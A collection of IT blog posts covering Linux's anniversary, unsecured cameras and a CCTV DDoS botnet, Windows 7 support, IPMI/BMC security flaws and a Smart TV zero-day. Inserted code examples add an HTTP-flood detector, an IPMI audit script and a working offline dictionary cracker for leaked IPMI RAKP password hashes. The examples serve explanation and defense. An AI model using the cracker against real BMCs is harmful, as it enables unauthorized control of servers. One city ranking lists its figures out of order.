Tag Archive for Linux

Linux Turns 25

Linus Torvalds released the first Linux operating system kernel on Oct. 5, 1991. On Oct. 6, 1991, Torvalds began arguing with the volunteer developers who would go on to make Linux an open-source powerhouse and eventually a household name. Today the Linux community is upwards of 86 million users strong.

As part of the celebrations marking Linux’s 25th birthday, the Linux Foundation has published its annual Linux Kernel Development Report (PDF, registration required). According to The Register, the report concludes that Linux is in great shape: “There may be no other examples of such a large, common resource being supported by such a large group of independent actors in such a collaborative way.”

The independent actors have a lot to collaborate on. The report notes that the first versions of the Linux kernel comprised about 10,000 lines of code. Now it’s nearing 22 million and growing at a rate of 4,600 lines a day.

While Linux may have started out as a hobby OS, that changed in the early 2000s. At the turn of the century, Wall Street banks demanded Linux support for their enterprise application servers, says Tech News World.

“That was a moment that broke down resistance to Linux in the big IT vendors like BEA, IBM, and Oracle (ORCL). That hole in the dam was the start of a flood,” said Cloud Foundry CEO Sam Ramji. “Today Linux is the home of operating system innovation.”

Aporeto virtualization expert Stefano Stabellini, who has been a Linux user and open source advocate since the 1990s, explained the transition. “… back when I started with Linux in the ’90s … [companies] did not understand it. They thought that open source was unsustainable, and Linux was niche and hobbyist.” He says that now everything has changed; every company has an open source strategy. “Microsoft (MSFT) was the biggest foe and now is a strong ally. Linux is the most widely adopted operating system of all time.”

Dice points out that the most active contributors to the growth of Linux have included (in descending order) Intel (INTC), Red Hat, Linaro, Samsung (005930), SUSE, IBM (IBM), and various corporate consultants. Google (GOOG), AMD (AMD), and Texas Instruments (TXN) also ranked in the top 15.

rb-

So my first pass at Linux was Red Hat Linux 5.0, when Novell bought into Linux. Yep, I was a Novell CNE 5 way back in the day.

The last couple of projects I have been involved with have used Linux, not Windows: CMS, IVR, PAFWs, and storage.

Ralph Bach has been in IT long enough to know better and has blogged from his Bach Seat about IT, careers, and anything else that catches his attention since 2005. You can follow him on LinkedIn, Facebook, and Twitter. Email the Bach Seat here.

Security Cam Concerns in Ann Arbor

Next time you are in Ann Arbor to get a bite to eat at Zingerman’s or attend a U of M football game at Michigan Stadium, someone may be watching you. NetworkWorld says Ann Arbor is one of the U.S. cities with the most unsecured security cameras. In fact, Ann Arbor ranks seventh nationally.

The report’s author, security firm Protection 1, analyzed data from Insecam, a site that indexes security cameras viewable online without a password. Protection 1 estimates there are over 11,000 open security cameras on the Internet in the U.S. and ranked the cities with the most cameras that anyone can view. The top 10 cities with unsecured security cameras, measured as open cameras per 100,000 residents, are:

  1. Walnut Creek, CA – 89.69 / 100,000 residents
  2. Richardson, TX – 72.74 / 100,000 residents
  3. Torrance, CA – 72.55 / 100,000 residents
  4. Newark, NJ – 38.07 / 100,000 residents
  5. Rancho Cucamonga, CA – 36.76 / 100,000 residents
  6. Corvallis, OR – 37.98 / 100,000 residents
  7. Ann Arbor, MI – 34.18 / 100,000 residents
  8. Orlando, FL – 34.05 / 100,000 residents
  9. Eau Claire, WI – 22.21 / 100,000 residents
  10. Albany, NY – 20.32 / 100,000 residents

Open security cameras connect to the Internet via Wi-Fi or a cable and either have no password protection at all or still use the manufacturer’s default password. Malicious people and governments can record or broadcast our lives from unprotected cameras. Open cameras are also vulnerable to attacks that turn them into bots.

From a privacy perspective, the most worrisome finding is that 15% of the open cameras are in Americans’ homes. Anyone can watch these cameras unless the default password is changed to a unique one that locks the camera down.

Besides being spied on from the web, open cameras can be exploited by criminals, who can force them to attack other things on the Internet as part of a DDoS attack.

A DDoS attack against a jewelry shop website led to the discovery of a CCTV-based botnet. A distributed denial-of-service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing a denial of service for users of the targeted system. TechTarget says the flood of incoming messages to the target system essentially forces it to shut down, denying service to legitimate users.

Help Net Security reports that Sucuri researchers discovered the jewelry site was being attacked by a CCTV botnet made up of 25,000+ cameras from around the globe. The website was first hit with a layer 7 attack (an HTTP flood) at 35,000 HTTP requests per second and then, when those efforts were thwarted, with 50,000 HTTP requests per second.

Sucuri researchers found that all the attacking IP addresses served a similar default page with the ‘DVR Components’ title. After digging some more, they found that all these devices were BusyBox based. BusyBox is a single executable that bundles stripped-down versions of the standard Unix command-line tools; it is the usual userland on embedded Linux devices such as cameras, DVRs and routers.
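Added example, not from the original post or from Sucuri: the request-rate check below is the kind of signal a site owner or hosting provider uses to spot a layer 7 HTTP flood like the one described above. It parses web server access-log lines in the common/combined format, keeps a sliding window of request times per client IP, and reports every source that exceeds a per-window threshold. The log lines are constructed inline (documentation addresses, not real attackers), and the threshold and window values are assumptions to tune against your own normal traffic.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common/combined log format prefix: ip ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, request line) or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), m.group("req")


def flood_sources(lines, max_requests, window_seconds):
    """Return {ip: peak requests seen inside one window} for every client that
    sent more than max_requests within any span of window_seconds.

    lines must be in time order, as a live log is. A deque of timestamps per IP
    is trimmed from the left as entries age out, so memory is bounded by the
    window length rather than by the length of the attack.
    """
    recent = defaultdict(deque)
    peak = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # a malformed line must not abort analysis mid-flood
        ip, ts, _req = parsed
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) > max_requests:
            peak[ip] = max(peak.get(ip, 0), len(window))
    return peak


def sample_log():
    """Constructed access log: one ordinary visitor plus two flood sources
    hammering a single URL, the shape of the HTTP flood in the article."""
    base = datetime(2016, 6, 27, 12, 0, 0, tzinfo=timezone.utc)
    events = [(base + timedelta(seconds=20 * i), "198.51.100.7", "GET /catalog HTTP/1.1")
              for i in range(3)]
    for ip in ("203.0.113.10", "203.0.113.11"):
        events += [(base + timedelta(milliseconds=50 * i), ip, "GET /index.php?s=1 HTTP/1.1")
                   for i in range(60)]
    events.sort(key=lambda e: e[0])
    return [f'{ip} - - [{ts.strftime(TS_FMT)}] "{req}" 200 512 "-" "Mozilla/4.0"'
            for ts, ip, req in events]


if __name__ == "__main__":
    for ip, count in flood_sources(sample_log(), max_requests=30, window_seconds=10).items():
        print(f"{ip}: {count} requests inside a 10 s window, candidate for blocking")
```

The output of `flood_sources` is a candidate blocklist, not a verdict: a flood from 25,000 distinct cameras means each source may stay under a per-IP threshold, which is exactly why the article's site needed upstream filtering rather than a single host rule.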

The compromised CCTV cameras were located around the globe:

  • 24% originated from Taiwan,
  • 12% United States,
  • 9% Indonesia,
  • 8% Mexico,
  • and elsewhere.

rb-

Unless something is done, security flaws, misconfiguration, and ignorance about the dangers of connecting unsecured devices to the IoT will keep these botnets functioning well into the future.

To protect your website from botnets and DDoS, you need to be able to block or absorb malicious traffic. Firms should talk to their hosting provider about DDoS attack protection: can they route incoming traffic through a distributed caching layer that filters out the malicious share, reducing the strain on the existing web servers? If not, find a reputable third-party service that can.

DDoS defense services require a paid subscription, but often cost less than scaling up your own server capacity to deal with a DDoS attack.

Arbor Networks is one firm that provides services and devices to defend against DDoS.

Google has launched Project Shield, to use Google’s infrastructure to support free expression online by helping independent sites mitigate DDoS attack traffic.

Windows 7 Reaches Middle Age

Now that you have almost eliminated Microsoft (MSFT) Windows XP from your network and settled on Windows 7, it should be time to catch your breath. But NOOO!! Windows 7 has reached the end of mainstream support. That’s right, we are already 5 years into the Windows 7 era. Repeat after me… Windows 7 still has five years left … Windows 7 still has five years left … Windows 7 still has five years left.

Microsoft commits to 10 years of security fixes and 5 years of feature enhancements and bug fixes for each major OS release. Windows 7 has moved from mainstream support, free help for everyone, to extended support, where security updates continue but non-security fixes and support incidents are paid. That will end in 2020 when Microsoft turns out the lights on Windows 7 for good.

The recent techno-flops from the boys and girls in Redmond, Vista and Windows 8, have taught enterprises to plan for a new desktop OS every other release. This puts businesses in a bind: MSFT’s track record prevents forward-looking firms from organically growing their desktop fleet into the next cycle. Some argue that until Microsoft separates consumer from commercial desktops, its commercial customers will continue to skip one or more iterations of Windows, their only real answer to the high cost and disruption of upgrading.

Gregg Keizer at ComputerWorld cites research from Gartner (IT) which predicts that many enterprises cannot change their processes and will go through the same machinations they did with XP, or may even balk at dumping Windows 7 at the same pace as the venerable Windows XP, making things worse. Michael Silver of Gartner told ComputerWorld that having a plan could help organizations avoid a repeat of XP’s expensive end-of-support scramble. Gartner believes that the same EOL mad scramble we saw with XP will occur again when time is up on Windows 7. Mr. Silver claims:

“[A repeat of Windows XP] is certainly likely to happen … One of the big differences that’s been under-considered is that because Vista took five years to come out [after XP], there were eight years between XP and Windows 7. So Windows XP felt pretty old. … Windows 7 won’t feel that old to people…”

Mr. Keizer argues that the failure of Windows 8 to win enterprise hearts and minds has created an oddity: even though Windows 7 has reached middle age, Microsoft continues to let OEMs sell PCs running the Windows 7 business edition. Microsoft has yet to name an end date for OEM sales of machines powered by Windows 7 Professional, but because it has promised 12 months’ notice, those PCs can still be sold at least until early January 2016, when the OS has but four years of life left.

But if you are just finishing your last migration, then you don’t have all that much time to start planning the next one.

rb-

If you don’t like the Redmond hamster wheel, consider your alternatives. Sophos compares the Windows upgrade schedule to some other options, and 10 years might be the best deal out there. For example:

  • Apple’s (AAPL) OS X is supported for mystery years,
  • Apple’s mobile iOS is supported for mystery years (3?)
  • Android seems to leave it up to you, but don’t expect Google (GOOG) to commit to securing it.
  • Ubuntu LTS is supported for around 5 years, and
  • Red Hat Enterprise Linux for 13 years (with extended support).

Server Management Security Hole

Dan Farmer, security researcher and creator of the SATAN vulnerability scanner, teamed up with HD Moore, chief research officer at Rapid7 and lead architect of the Metasploit penetration testing framework, and found 230,000 publicly accessible out-of-band management interfaces on the Internet. Many of these systems were running software that dates back to 2001.

Out-Of-Band server management

According to PCWorld, the out-of-band (OOB) management interfaces expose servers to the Internet through microcontrollers embedded in the motherboard that run independently of the main OS and provide monitoring and administration functions. These microcontrollers are called Baseboard Management Controllers (BMCs). BMCs are the core of the Intelligent Platform Management Interface (IPMI), a standardized interface to a variety of sensors and controllers that lets administrators manage servers remotely even when they are shut down or unresponsive, as long as they are still connected to the power supply.

BMCs are embedded systems with their own firmware, usually Linux-based. IPMI itself is an OS-agnostic and pervasive protocol, initially developed by Intel (INTC), Dell (DELL), HP (HPQ), and other large equipment manufacturers to handle OOB, or lights-out, management.

Rebranded by OEM manufacturers

Pure IPMI is usually implemented as a network service that listens on UDP port 623. It can either piggyback on the server’s network port or use a dedicated Ethernet port. Vendors take IPMI as a base, add a variety of services such as mail, SNMP, and web GUIs, and then rebrand the package:

  • Dell has iDRAC,
  • Hewlett-Packard has iLO,
  • IBM (IBM) has IMM2.

IPMI is also used as the engine for higher-level protocols, some of them put out by the DMTF (WBEM, CIM, etc.), the OpenStack Foundation, and others. According to the research paper, IPMI is particularly popular for large-scale provisioning, roll-outs, remote troubleshooting, and console access.

Parasitic oversight

The parasitic BMC has near-complete control and oversight of the server it rides on. It can reach the server’s memory, networking, and storage media. It cannot be truly turned off: it runs continuously unless the power cord is pulled. An owner can only temporarily disable outside interaction, short of taking a hammer to the motherboard.

Security researchers have warned in the past that most IPMI implementations suffer from architectural insecurities and other vulnerabilities that can be exploited to gain administrative access to BMCs. Attackers who control a BMC can mount attacks against the server’s OS as well as against other servers in the same management group.

Dan Farmer stated in his recent paper, Sold Down the River (PDF):

For over a decade major server manufacturers have harmed their customers by shipping servers that are vulnerable by default, with a management protocol that is insecure by design, and with little to no documentation about how to make things better … These vendors have not only gone out of their way to make their offerings difficult to understand or audit but also neglected to supply any substantial defense tools or helpful security controls.

Old BMC software

Mr. Farmer and Mr. Moore scanned the Internet in May 2014 and identified 230,000 publicly accessible BMCs. A deeper analysis of the at-risk systems revealed:

  • 46.8% of them were running IPMI version 1.5, which dates back to 2001,
  • 53.2% were running IPMI version 2.0, which was released in 2004.

The researchers reported that nearly all the systems running IPMI v1.5 were configured so that every account could be logged into without authentication: “… you can login to pretty much any older IPMI system without an account or a password.” Mr. Farmer explains that this set-up can grant an attacker privileged access: “… in most cases, they grant administrative access, and even when they don’t the mere ability to execute any kind of commands without authentication is a bad thing.”

The team found that IPMI 2.0, which added cryptographic protection, has its own security issues. For example, the first cipher suite option, known as cipher zero, provides no authentication, integrity, or confidentiality protection, Farmer said: a valid user name is all that is required to log in, with no password. The researchers found that around 60% of the publicly accessible BMCs running IPMI version 2 had this vulnerability.

Server management issues in IPMI 2.0

Another serious issue introduced by IPMI 2.0 stems from its RAKP key-exchange protocol, used when negotiating secure connections. The protocol lets an anonymous user obtain the password hash (strictly, an HMAC keyed with the password, which serves a cracker just as well) of any account on the BMC, as long as the account name is known.

“This is an astonishingly bad design, because it allows an attacker to grab your password’s hash and do offline password cracking with as many resources as desired to throw at the problem,” Farmer said.

The analysis showed that 83% of the identified BMCs were vulnerable to this issue. A test with the password cracker John the Ripper, using a modest 4.7 million-word dictionary, recovered 30% of the BMC passwords. Farmer calculated that between 72.8% and 92.5% of BMCs running IPMI 2.0, depending on the password cracking success rate, had authentication issues and were vulnerable to unauthorized access.
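To show why the RAKP leak is so damaging, here is an added example (not code from the paper, from Metasploit or from John the Ripper) that reproduces the mechanism offline, with no BMC and no network. In the RAKP-HMAC-SHA1 variant (cipher suites 1 through 5), RAKP Message 2 carries an HMAC-SHA1 keyed with the account’s password over the session fields listed in the IPMI 2.0 specification, and the BMC sends it before the client has proven anything. The code builds that HMAC the way a BMC would for a constructed session (session IDs, randoms, GUID and the weak password are all made up for the demo), then recovers the password from it with a small wordlist, which is what the paper’s John the Ripper run did at scale. The user name is part of the HMAC input, so an attacker has to know it, exactly as the text says.

```python
import hashlib
import hmac
import struct


def rakp2_hmac_input(sid_m, sid_c, rand_m, rand_c, guid_c, role_m, username):
    """Bytes the BMC authenticates in RAKP Message 2 (IPMI 2.0, RAKP-HMAC-SHA1):
    SIDm | SIDc | Rm | Rc | GUIDc | ROLEm | ULENm | UNAMEm
    with the two session IDs as 32-bit little-endian, the randoms and GUID as
    16 bytes each, and the role and username length as single bytes.
    """
    uname = username.encode()
    return (struct.pack("<II", sid_m, sid_c) + rand_m + rand_c + guid_c
            + bytes([role_m, len(uname)]) + uname)


def bmc_rakp2_auth_code(password, msg_input):
    """What the BMC sends back: HMAC-SHA1 keyed with the account's password.

    The BMC stores the password in a zero-padded 16- or 20-byte field and keys
    the HMAC with that field. HMAC itself zero-pads keys shorter than its block
    size, so keying with the raw password is byte-for-byte the same result
    (see padding_equivalent).
    """
    return hmac.new(password.encode(), msg_input, hashlib.sha1).digest()


def padding_equivalent(password, msg_input):
    """True when HMAC keyed with the raw password equals HMAC keyed with the
    20-byte zero-padded field a BMC stores (holds for passwords up to 20 bytes)."""
    raw = hmac.new(password.encode(), msg_input, hashlib.sha1).digest()
    padded = hmac.new(password.encode().ljust(20, b"\0"), msg_input, hashlib.sha1).digest()
    return raw == padded


def crack_rakp(auth_code, msg_input, wordlist):
    """Offline dictionary attack on a captured RAKP2 auth code: recompute the
    HMAC for each candidate and compare. Returns the recovered password or None."""
    for candidate in wordlist:
        if hmac.compare_digest(bmc_rakp2_auth_code(candidate, msg_input), auth_code):
            return candidate
    return None


def demo():
    """Constructed session with fixed randoms so the run is reproducible.
    In a real exchange the attacker picks SIDm and Rm, supplies the username in
    RAKP Message 1, and reads SIDc, Rc and GUIDc back from the BMC's reply."""
    msg = rakp2_hmac_input(
        sid_m=0xA0A1A2A3, sid_c=0x01020304,
        rand_m=bytes(range(16)), rand_c=bytes(range(16, 32)),
        guid_c=bytes(16), role_m=0x04,  # requested privilege level: Administrator
        username="ADMIN")
    leaked = bmc_rakp2_auth_code("calvin", msg)  # the demo's chosen weak password
    wordlist = ["password", "admin", "root", "calvin", "changeme"]
    return crack_rakp(leaked, msg, wordlist)


if __name__ == "__main__":
    print("recovered password:", demo())
```

Nothing in the protocol limits how many RAKP Message 1 requests a BMC will answer, so the cracker can collect one auth code per known account and grind through them with whatever hardware is at hand; the only defense the protocol leaves you is a password that is not in any wordlist.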

Canary in the coal mine

“While a quarter of a million BMCs is only a tiny sliver of the total computing power in the world, it’s still an important indicator as a kind of canary in the coal mine,” Mr. Farmer warns. He predicts that BMCs behind corporate firewalls share the same issues: “While management systems are often not directly assailable from the outside they’re often left open once the outer thin hard candy shell of an organization is breached.”

The research paper includes recommendations for server administrators on how to mitigate some of the identified issues and better secure their BMCs, but the researchers conclude that the problem of insecure IPMI implementations will linger for a long time. Mr. Farmer concludes with a rant:

Many of these problems would have been easy to fix if the IPMI protocol had undergone a serious security review or if the developers of modern BMCs had spent a little more effort in hardening their products and giving their customers the tools to secure their servers … At this point, it is far too late to effect meaningful change. The sheer number of servers that include a vulnerable BMC will guarantee that IPMI vulnerabilities and insecure configurations will continue to be a problem for years to come.

rb-

They told us so, about a year ago.

Defense-in-depth: block UDP port 623 at the perimeter (yes, all of them) and on the end-points too, if you are running host firewalls.

Disable or remove the default vendor user names and pick a strong user ID and password.

Least privilege: the researchers warn that anyone with administrative privileges on the server’s own OS has administrative control over its BMC and can disable or enable IPMI, add or remove accounts, change the IP address, etc., all without ever authenticating to the BMC.
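A configuration check that ties the cipher-zero finding above to the hardening steps in this list, added here as an example that is not from the paper or from ipmitool: it parses the output of `ipmitool lan print <channel>` (the sample below is constructed to match ipmitool’s layout, not captured from a real BMC), flags cipher suite 0 and any privilege level that still accepts the IPMI 1.5 NONE authentication type, and prints the matching `ipmitool lan set` commands. Keeping only the AES-bearing suites (3, 8, 12, and 17 where a BMC lists it) is this example’s assumption; restrict it further if your tooling only needs one suite.

```python
import re

# Constructed sample in ipmitool's "lan print" layout; not captured from a real BMC.
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5 PASSWORD
                        : User     : NONE MD2 MD5 PASSWORD
                        : Operator : MD2 MD5 PASSWORD
                        : Admin    : MD2 MD5 PASSWORD
                        : OEM      : MD2 MD5 PASSWORD
IP Address Source       : Static Address
IP Address              : 192.0.2.50
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaaaaaaaaaaaa
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""

# IPMI 2.0 cipher suites that carry AES-CBC-128 confidentiality; the others are
# integrity-only or, for suite 0, nothing at all. Which of these to keep is a
# policy choice (an assumption of this example).
AES_SUITES = {3, 8, 12, 17}

AUTH_LINE = re.compile(
    r"^(?:Auth Type Enable\s*|\s*):\s*(Callback|User|Operator|Admin|OEM)\s*:\s*(.*)$")


def parse_lan_print(text):
    """Extract the supported RMCP+ suites, the per-suite privilege string and
    the enabled IPMI 1.5 auth types per privilege level."""
    info = {"suites": [], "priv_max": "", "auth_enable": {}}
    for line in text.splitlines():
        if line.startswith("RMCP+ Cipher Suites"):
            field = line.split(":", 1)[1]
            info["suites"] = [int(x) for x in field.split(",") if x.strip()]
        elif line.startswith("Cipher Suite Priv Max"):
            info["priv_max"] = line.split(":", 1)[1].strip()
        else:
            m = AUTH_LINE.match(line)
            if m:
                info["auth_enable"][m.group(1)] = m.group(2).split()
    return info


def audit(info):
    """Return a list of findings; an empty list means the channel passes both checks."""
    findings = []
    priv = info["priv_max"]
    # The i-th character of the privilege string is the max privilege for
    # suite i; 'X' means the suite is disabled.
    if 0 in info["suites"] and priv and priv[0] != "X":
        findings.append(f"cipher suite 0 enabled (max privilege '{priv[0]}'): "
                        "any valid username logs in with no password")
    for level, types in info["auth_enable"].items():
        if "NONE" in types:
            findings.append(f"auth type NONE enabled for {level}: "
                            "IPMI 1.5 sessions need no authentication")
    return findings


def remediation(info, channel=1):
    """ipmitool commands that disable suite 0 (and every other non-AES suite)
    and drop NONE from each privilege level that still lists it."""
    priv = info["priv_max"]
    wanted = "".join("a" if i in AES_SUITES and i in info["suites"] else "X"
                     for i in range(len(priv)))
    cmds = [f"ipmitool lan set {channel} cipher_privs {wanted}"]
    for level, types in info["auth_enable"].items():
        if "NONE" in types:
            keep = ",".join(t.lower() for t in types if t != "NONE") or "md5"
            cmds.append(f"ipmitool lan set {channel} auth {level.lower()} {keep}")
    return cmds


if __name__ == "__main__":
    info = parse_lan_print(SAMPLE_LAN_PRINT)
    for finding in audit(info):
        print("FINDING:", finding)
    for cmd in remediation(info):
        print("FIX:", cmd)
```

Run the audit again after applying the commands; vendors differ in which suites they actually honor, so the rewritten privilege string is the proof, not the command’s exit status. Neither step helps against the RAKP hash leak, which is a property of the protocol: that one only a strong password and a blocked port 623 address.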

Smart TVs Dumb Security

When a device gets connected to the web without any security, it leaves its users vulnerable. This is a trend as the Internet of Things evolves. In this case, Samsung Smart TVs seem to have no security at all: a dumb TV. Dailywireless.org reports that 40% of Americans have connected their TV to the Internet.

At the same time, The Security Ledger is reporting that a “Security Hole in Samsung Smart TVs Could Allow Remote Spying.” The Malta-based firm ReVuln says it has uncovered a remotely exploitable security hole in Samsung Smart TVs. If left unpatched, the vulnerability could allow hackers to make off with owners’ social media credentials. Attackers could also spy on those watching the TV through compatible video cameras and microphones.

ReVuln is a security research firm that offers information on the security holes it discovers only to subscribers. However, it did confirm the previously unknown (“zero-day”) hole with Security Ledger. The zero-day affects Samsung Electronics Co. (005930) Smart TVs running the latest version of the company’s Linux-based firmware. It could give an attacker access to any file on the remote device, and external devices (such as USB drives) connected to the TV are just as exposed.

In an Orwellian twist, the hole could be used to take over cameras and microphones attached to the Smart TVs, granting remote attackers the ability to spy on those viewing a compromised set. Luigi Auriemma of ReVuln told ComputerWorld via email, “If the attacker has full control of the TV … then he can do everything like stealing accounts to the worst scenario of using the integrated webcam and microphone to ‘watch’ the victim.”

Security Ledger says that the Smart TVs offer no native security features, such as a firewall, user authentication, or application whitelisting. More critically, there is no independent software update capability, which means that, barring a firmware update from Samsung, the exploitable hole can’t be patched without “voiding the device’s warranty and using other exploits,” ReVuln said.

The company posted a video of an attack on a Samsung LED 3D Smart TV online. It shows an attacker gaining shell access to the TV, copying the contents of its hard drive to an external device and mounting them on a local drive, which gave access to photos, documents, and other content. ReVuln said an attacker would also be able to lift credentials for any social networks or other online services accessed from the device.

rb-

There is no patch. Until there is, Smart TV users will have to wait for Samsung to fix this huge security hole or fix it themselves and risk voiding their warranty. A Smart TV with a complete lack of security features: Smart TV, Dumb Security.
